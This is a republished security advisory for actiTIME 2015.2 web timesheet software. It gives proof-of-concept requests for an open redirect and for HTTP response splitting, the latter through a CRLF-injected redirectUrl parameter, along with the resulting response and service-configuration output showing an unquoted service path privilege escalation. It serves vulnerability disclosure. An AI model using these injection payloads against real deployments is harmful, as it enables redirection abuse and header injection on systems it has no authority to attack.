actiTIME 2015.2 Multiple Vulnerabilities

2015.11.01
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

actiTIME 2015.2 Multiple Vulnerabilities Vendor: Actimind, Inc. Product web page: http://www.actitime.com Affected version: 2015.2 (Small Team Edition) Summary: actiTIME is a web timesheet software. It allows you to enter time spent on different work assignments, register time offs and sick leaves, and then create detailed reports covering almost any management or accounting needs. Desc: The application suffers from multiple security vulnerabilities including: Open Redirection, HTTP Response Splitting and Unquoted Service Path Elevation Of Privilege. Tested on: OS/Platform: Windows 7 6.1 for x86 Servlet Container: Jetty/5.1.4 Servlet API Version: 2.4 Java: 1.7.0_76-b13 Database: MySQL 5.1.72-community-log Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13 Patch level: 28.0 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5273 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php 13.10.2015 -- 1. Open Redirect ----------------- http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1 2. HTTP Response Splitting --------------------------- http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1 Response: HTTP/1.1 302 Moved Temporarily Date: Wed, 14 Oct 2015 09:32:05 GMT Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76 Content-Type: text/html;charset=UTF-8 Cache-Control: no-store, no-cache Pragma: no-cache Expires: Tue, 09 Sep 2014 09:32:05 GMT X-UA-Compatible: IE=Edge Location: http://localhost/administration/ Server: Waddup/2.0 Content-Length: 0 3. Unquoted Service Path Elevation Of Privilege ------------------------------------------------ C:Usersjoxy>sc qc actiTIME [SC] QueryServiceConfig SUCCESS SERVICE_NAME: actiTIME TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program Files (x86)actiTIMEactitime_access.exe startAsService LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : actiTIME Server DEPENDENCIES : actiTIME MySQL SERVICE_START_NAME : LocalSystem

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top